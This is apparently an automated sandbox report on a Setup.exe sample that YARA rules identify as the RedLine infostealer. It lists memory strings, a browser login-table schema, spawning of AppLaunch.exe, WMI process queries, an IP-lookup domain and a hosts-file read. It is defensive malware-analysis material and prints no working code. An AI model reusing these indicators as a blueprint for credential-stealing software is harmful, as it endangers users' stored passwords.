                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007233000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                    Source: AppLaunch.exe, 00000002.00000002.408509605.00000000071A3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007111000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: AppLaunch.exe, 00000002.00000002.412432062.0000000008BE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008BFE000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007502000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D77000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B63000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DF5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D5A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DD8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C5F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CDD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B80000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CFA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007590000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: AppLaunch.exe, 00000002.00000002.412432062.0000000008BE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008BFE000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007502000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D77000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B63000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DF5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D5A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DD8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C5F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CDD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B80000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CFA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007590000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: AppLaunch.exe, 00000002.00000002.412432062.0000000008BE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008BFE000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007502000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D77000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B63000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DF5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D5A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DD8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C5F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CDD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B80000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CFA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007590000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: AppLaunch.exe, 00000002.00000002.412432062.0000000008BFE000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D77000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DF5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B80000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CFA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: AppLaunch.exe, 00000002.00000002.412432062.0000000008BE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008BFE000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007502000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D77000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B63000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DF5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D5A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DD8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C5F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CDD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B80000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CFA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007590000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: AppLaunch.exe, 00000002.00000002.412432062.0000000008BE1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008BFE000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007502000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D77000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B63000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DF5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008D5A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008DD8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C5F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CDD000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008B80000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008CFA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.408509605.0000000007590000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownDNS traffic detected: queries for: api.ip.sb
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00423860 GetWindowRect,IsMenu,GetSubMenu,SetDlgItemInt,GetWindowPlacement,CharLowerBuffA,EnableMenuItem,CheckMenuRadioItem,GetSysColor,KillTimer,DestroyIcon,DestroyWindow,PostQuitMessage,GetClientRect,MoveWindow,GetSystemMenu,SetTimer,SetWindowPlacement,InsertMenuItemA,GetMenu,CheckMenuItem,SetMenuItemInfoA,SetActiveWindow,DefDlgProcA,RegisterClassA,EndDialog,SetDlgItemTextA,EnumClipboardFormats,GetClipboardData,CloseClipboard,GetClassInfoA,CallWindowProcA,SetWindowLongA,IsDlgButtonChecked,SetWindowTextA,CheckDlgButton,GetActiveWindow,LoadCursorA,MessageBoxA,wsprintfA,GetDlgItemTextA,SendMessageA,GetCursorPos,TrackPopupMenu,ClientToScreen,DestroyMenu,CreatePopupMenu,AppendMenuA,SendDlgItemMessageA,GetDlgItem,0_2_00423860
                    Source: Setup.exe, 00000000.00000002.351349391.000000000062A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.3.Setup.exe.560000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 2.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.Setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.3.Setup.exe.560000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 2.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.Setup.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004158890_2_00415889
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004063420_2_00406342
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004153450_2_00415345
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00405B620_2_00405B62
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0040CBCD0_2_0040CBCD
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004164C50_2_004164C5
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004175310_2_00417531
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00415DCD0_2_00415DCD
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406E000_2_00406E00
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0040568D0_2_0040568D
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004067620_2_00406762
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00405F360_2_00405F36
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_057404482_2_05740448
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0574E6D82_2_0574E6D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_05741EF02_2_05741EF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_05740B732_2_05740B73
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_057403AF2_2_057403AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_05741EE02_2_05741EE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_091608E02_2_091608E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09161AF72_2_09161AF7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09163FD02_2_09163FD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_091630F12_2_091630F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_091614502_2_09161450
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0916E6152_2_0916E615
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0916B8B02_2_0916B8B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0916B8A02_2_0916B8A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09163FC02_2_09163FC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0916EEC02_2_0916EEC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0916143F2_2_0916143F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0CB58F2_2_0F0CB58F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0C34802_2_0F0C3480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0CEC682_2_0F0CEC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0CEC612_2_0F0CEC61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0CC1D02_2_0F0CC1D0
                    Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 0040D194 appears 48 times
                    Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 00401030 appears 34 times
                    Source: Setup.exe, 00000000.00000000.349607752.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameaA86qISn: vs Setup.exe
                    Source: Setup.exe, 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePinholes.exe4 vs Setup.exe
                    Source: Setup.exe, 00000000.00000003.351025860.000000000058D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePinholes.exe4 vs Setup.exe
                    Source: Setup.exeBinary or memory string: OriginalFilenameaA86qISn: vs Setup.exe
                    Source: Setup.exeStatic PE information: invalid certificate
                    Source: Setup.exeVirustotal: Detection: 45%
                    Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe C:\Users\user\Desktop\Setup.exe
                    Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe
                    Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@2/1
                    Source: AppLaunch.exe, 00000002.00000002.412432062.0000000008AFE000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008A5D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412432062.0000000008AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
